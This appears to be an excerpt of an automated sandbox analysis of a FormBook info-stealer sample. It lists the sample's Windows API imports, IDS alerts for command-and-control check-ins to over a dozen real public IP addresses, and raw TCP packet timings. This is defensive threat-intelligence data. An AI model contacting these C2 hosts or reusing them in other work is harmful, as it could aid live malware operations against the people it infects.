EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-04T12:49:34.577709+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49736 | 161.97.168.245 | 80 | TCP
2024-12-04T12:49:34.577709+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49736 | 161.97.168.245 | 80 | TCP
2024-12-04T12:49:52.219235+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49737 | 27.124.4.246 | 80 | TCP
2024-12-04T12:49:54.844256+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49738 | 27.124.4.246 | 80 | TCP
2024-12-04T12:49:57.500488+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49739 | 27.124.4.246 | 80 | TCP
2024-12-04T12:50:00.156746+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49742 | 27.124.4.246 | 80 | TCP
2024-12-04T12:50:00.156746+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49742 | 27.124.4.246 | 80 | TCP
2024-12-04T12:50:08.322933+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49763 | 149.88.81.190 | 80 | TCP
2024-12-04T12:50:11.000584+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49769 | 149.88.81.190 | 80 | TCP
2024-12-04T12:50:13.656916+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49775 | 149.88.81.190 | 80 | TCP
2024-12-04T12:50:16.312001+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49784 | 149.88.81.190 | 80 | TCP
2024-12-04T12:50:16.312001+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49784 | 149.88.81.190 | 80 | TCP
2024-12-04T12:50:24.063375+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49802 | 85.159.66.93 | 80 | TCP
2024-12-04T12:50:26.722193+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49808 | 85.159.66.93 | 80 | TCP
2024-12-04T12:50:29.394194+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49816 | 85.159.66.93 | 80 | TCP
2024-12-04T12:50:31.856451+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49825 | 85.159.66.93 | 80 | TCP
2024-12-04T12:50:31.856451+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49825 | 85.159.66.93 | 80 | TCP
2024-12-04T12:50:38.879151+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49841 | 185.27.134.144 | 80 | TCP
2024-12-04T12:50:41.691760+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49847 | 185.27.134.144 | 80 | TCP
2024-12-04T12:50:44.412120+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49853 | 185.27.134.144 | 80 | TCP
2024-12-04T12:50:47.033657+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49862 | 185.27.134.144 | 80 | TCP
2024-12-04T12:50:47.033657+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49862 | 185.27.134.144 | 80 | TCP
2024-12-04T12:50:54.031935+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49879 | 104.21.95.160 | 80 | TCP
2024-12-04T12:50:56.413445+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49885 | 104.21.95.160 | 80 | TCP
2024-12-04T12:50:59.102269+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49891 | 104.21.95.160 | 80 | TCP
2024-12-04T12:51:02.253784+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49897 | 104.21.95.160 | 80 | TCP
2024-12-04T12:51:02.253784+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49897 | 104.21.95.160 | 80 | TCP
2024-12-04T12:51:09.203109+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49916 | 104.21.57.248 | 80 | TCP
2024-12-04T12:51:11.872200+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49924 | 104.21.57.248 | 80 | TCP
2024-12-04T12:51:14.514792+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49930 | 104.21.57.248 | 80 | TCP
2024-12-04T12:51:17.199008+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49935 | 104.21.57.248 | 80 | TCP
2024-12-04T12:51:17.199008+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49935 | 104.21.57.248 | 80 | TCP
2024-12-04T12:51:24.517114+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49953 | 154.88.22.101 | 80 | TCP
2024-12-04T12:51:27.188206+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49960 | 154.88.22.101 | 80 | TCP
2024-12-04T12:51:29.875736+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49967 | 154.88.22.101 | 80 | TCP
2024-12-04T12:51:32.537230+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49973 | 154.88.22.101 | 80 | TCP
2024-12-04T12:51:32.537230+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49973 | 154.88.22.101 | 80 | TCP
2024-12-04T12:51:39.434909+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49989 | 209.74.77.107 | 80 | TCP
2024-12-04T12:51:42.097305+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49998 | 209.74.77.107 | 80 | TCP
2024-12-04T12:51:44.812562+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50005 | 209.74.77.107 | 80 | TCP
2024-12-04T12:51:47.416118+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50012 | 209.74.77.107 | 80 | TCP
2024-12-04T12:51:47.416118+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50012 | 209.74.77.107 | 80 | TCP
2024-12-04T12:52:06.692831+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50037 | 104.21.34.103 | 80 | TCP
2024-12-04T12:52:09.364227+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50038 | 104.21.34.103 | 80 | TCP
2024-12-04T12:52:12.089088+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50039 | 104.21.34.103 | 80 | TCP
2024-12-04T12:52:14.720776+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50040 | 104.21.34.103 | 80 | TCP
2024-12-04T12:52:14.720776+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50040 | 104.21.34.103 | 80 | TCP
2024-12-04T12:52:24.157273+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50041 | 20.2.249.7 | 80 | TCP
2024-12-04T12:52:26.816512+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50042 | 20.2.249.7 | 80 | TCP
2024-12-04T12:52:29.518405+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50043 | 20.2.249.7 | 80 | TCP
2024-12-04T12:52:32.225834+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50044 | 20.2.249.7 | 80 | TCP
2024-12-04T12:52:32.225834+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50044 | 20.2.249.7 | 80 | TCP
2024-12-04T12:52:39.414424+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50045 | 156.251.17.224 | 80 | TCP
2024-12-04T12:52:42.082861+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50046 | 156.251.17.224 | 80 | TCP
2024-12-04T12:52:44.766522+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50047 | 156.251.17.224 | 80 | TCP
2024-12-04T12:52:47.426257+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50048 | 156.251.17.224 | 80 | TCP
2024-12-04T12:52:47.426257+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50048 | 156.251.17.224 | 80 | TCP
2024-12-04T12:52:54.298723+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50049 | 47.254.140.255 | 80 | TCP
2024-12-04T12:52:56.964994+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50050 | 47.254.140.255 | 80 | TCP
2024-12-04T12:52:59.716476+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50051 | 47.254.140.255 | 80 | TCP
2024-12-04T12:53:02.438178+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50052 | 47.254.140.255 | 80 | TCP
2024-12-04T12:53:02.438178+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50052 | 47.254.140.255 | 80 | TCP
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Dec 4, 2024 12:49:33.164457083 CET  49736  80  192.168.2.4  161.97.168.245
Dec 4, 2024 12:49:33.284590006 CET  80  49736  161.97.168.245  192.168.2.4
Dec 4, 2024 12:49:33.286181927 CET  49736  80  192.168.2.4  161.97.168.245
Dec 4, 2024 12:49:33.295788050 CET  49736  80  192.168.2.4  161.97.168.245
Dec 4, 2024 12:49:33.416310072 CET  80  49736  161.97.168.245  192.168.2.4
Dec 4, 2024 12:49:34.577518940 CET  80  49736  161.97.168.245  192.168.2.4
Dec 4, 2024 12:49:34.577559948 CET  80  49736  161.97.168.245  192.168.2.4
Dec 4, 2024 12:49:34.577574968 CET  80  49736  161.97.168.245  192.168.2.4
Dec 4, 2024 12:49:34.577708960 CET  49736  80  192.168.2.4  161.97.168.245
Dec 4, 2024 12:49:34.577939987 CET  80  49736  161.97.168.245  192.168.2.4
Dec 4, 2024 12:49:34.578118086 CET  49736  80  192.168.2.4  161.97.168.245
Dec 4, 2024 12:49:34.582446098 CET  49736  80  192.168.2.4  161.97.168.245
Dec 4, 2024 12:49:34.702342987 CET  80  49736  161.97.168.245  192.168.2.4
Dec 4, 2024 12:49:50.660269022 CET  49737  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:49:50.780364037 CET  80  49737  27.124.4.246  192.168.2.4
Dec 4, 2024 12:49:50.781281948 CET  49737  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:49:50.794718981 CET  49737  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:49:50.915688038 CET  80  49737  27.124.4.246  192.168.2.4
Dec 4, 2024 12:49:52.176594973 CET  80  49737  27.124.4.246  192.168.2.4
Dec 4, 2024 12:49:52.219234943 CET  49737  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:49:52.297873974 CET  49737  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:49:52.378205061 CET  80  49737  27.124.4.246  192.168.2.4
Dec 4, 2024 12:49:52.378254890 CET  49737  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:49:53.316473007 CET  49738  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:49:53.436400890 CET  80  49738  27.124.4.246  192.168.2.4
Dec 4, 2024 12:49:53.436572075 CET  49738  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:49:53.451234102 CET  49738  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:49:53.571187019 CET  80  49738  27.124.4.246  192.168.2.4
Dec 4, 2024 12:49:54.790479898 CET  80  49738  27.124.4.246  192.168.2.4
Dec 4, 2024 12:49:54.844255924 CET  49738  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:49:54.953717947 CET  49738  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:49:54.982808113 CET  80  49738  27.124.4.246  192.168.2.4
Dec 4, 2024 12:49:54.982856035 CET  49738  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:49:55.972460032 CET  49739  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:49:56.092292070 CET  80  49739  27.124.4.246  192.168.2.4
Dec 4, 2024 12:49:56.092387915 CET  49739  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:49:56.106270075 CET  49739  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:49:56.226139069 CET  80  49739  27.124.4.246  192.168.2.4
Dec 4, 2024 12:49:56.226195097 CET  80  49739  27.124.4.246  192.168.2.4
Dec 4, 2024 12:49:56.226314068 CET  80  49739  27.124.4.246  192.168.2.4
Dec 4, 2024 12:49:56.226380110 CET  80  49739  27.124.4.246  192.168.2.4
Dec 4, 2024 12:49:56.226593018 CET  80  49739  27.124.4.246  192.168.2.4
Dec 4, 2024 12:49:56.226650000 CET  80  49739  27.124.4.246  192.168.2.4
Dec 4, 2024 12:49:56.226778030 CET  80  49739  27.124.4.246  192.168.2.4
Dec 4, 2024 12:49:56.226829052 CET  80  49739  27.124.4.246  192.168.2.4
Dec 4, 2024 12:49:56.226839066 CET  80  49739  27.124.4.246  192.168.2.4
Dec 4, 2024 12:49:57.449558020 CET  80  49739  27.124.4.246  192.168.2.4
Dec 4, 2024 12:49:57.500488043 CET  49739  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:49:57.611424923 CET  49739  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:49:57.642241955 CET  80  49739  27.124.4.246  192.168.2.4
Dec 4, 2024 12:49:57.642313004 CET  49739  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:49:58.628484964 CET  49742  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:49:58.748260021 CET  80  49742  27.124.4.246  192.168.2.4
Dec 4, 2024 12:49:58.748387098 CET  49742  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:49:58.757409096 CET  49742  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:49:58.910702944 CET  80  49742  27.124.4.246  192.168.2.4
Dec 4, 2024 12:50:00.105895996 CET  80  49742  27.124.4.246  192.168.2.4
Dec 4, 2024 12:50:00.156745911 CET  49742  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:50:00.298616886 CET  80  49742  27.124.4.246  192.168.2.4
Dec 4, 2024 12:50:00.298727989 CET  49742  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:50:00.299803972 CET  49742  80  192.168.2.4  27.124.4.246
Dec 4, 2024 12:50:00.419562101 CET  80  49742  27.124.4.246  192.168.2.4
Dec 4, 2024 12:50:06.687797070 CET  49763  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:06.807569981 CET  80  49763  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:06.808346987 CET  49763  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:06.831717968 CET  49763  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:06.951452971 CET  80  49763  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:08.322623968 CET  80  49763  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:08.322849035 CET  80  49763  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:08.322932959 CET  49763  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:08.344454050 CET  49763  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:09.363158941 CET  49769  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:09.483002901 CET  80  49769  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:09.483088970 CET  49769  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:09.499576092 CET  49769  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:09.619357109 CET  80  49769  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:11.000583887 CET  49769  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:11.032449961 CET  80  49769  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:11.032476902 CET  80  49769  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:11.032526016 CET  49769  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:11.032568932 CET  49769  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:11.120585918 CET  80  49769  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:11.120650053 CET  49769  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:12.019295931 CET  49775  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:12.139448881 CET  80  49775  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:12.139564991 CET  49775  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:12.153475046 CET  49775  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:12.273452997 CET  80  49775  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:12.273464918 CET  80  49775  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:12.273513079 CET  80  49775  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:12.273574114 CET  80  49775  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:12.273602009 CET  80  49775  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:12.273663044 CET  80  49775  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:12.273674011 CET  80  49775  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:12.273693085 CET  80  49775  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:12.273744106 CET  80  49775  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:13.656915903 CET  49775  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:13.700366974 CET  80  49775  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:13.702217102 CET  49775  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:13.703346968 CET  80  49775  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:13.705219030 CET  49775  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:13.776774883 CET  80  49775  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:13.777230978 CET  49775  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:14.677515984 CET  49784  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:14.797303915 CET  80  49784  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:14.797465086 CET  49784  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:14.836179972 CET  49784  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:14.956126928 CET  80  49784  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:16.311793089 CET  80  49784  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:16.311883926 CET  80  49784  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:16.312000990 CET  49784  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:16.314567089 CET  49784  80  192.168.2.4  149.88.81.190
Dec 4, 2024 12:50:16.434978962 CET  80  49784  149.88.81.190  192.168.2.4
Dec 4, 2024 12:50:22.417253017 CET  49802  80  192.168.2.4  85.159.66.93
Dec 4, 2024 12:50:22.537775993 CET  80  49802  85.159.66.93  192.168.2.4
Dec 4, 2024 12:50:22.537888050 CET  49802  80  192.168.2.4  85.159.66.93
Dec 4, 2024 12:50:22.552916050 CET  49802  80  192.168.2.4  85.159.66.93
Dec 4, 2024 12:50:22.673377991 CET  80  49802  85.159.66.93  192.168.2.4
Dec 4, 2024 12:50:24.063374996 CET  49802  80  192.168.2.4  85.159.66.93
Dec 4, 2024 12:50:24.183598995 CET  80  49802  85.159.66.93  192.168.2.4
Dec 4, 2024 12:50:24.184392929 CET  49802  80  192.168.2.4  85.159.66.93
Dec 4, 2024 12:50:25.082022905 CET  49808  80  192.168.2.4  85.159.66.93
Dec 4, 2024 12:50:25.201865911 CET  80  49808  85.159.66.93  192.168.2.4
Dec 4, 2024 12:50:25.201978922 CET  49808  80  192.168.2.4  85.159.66.93
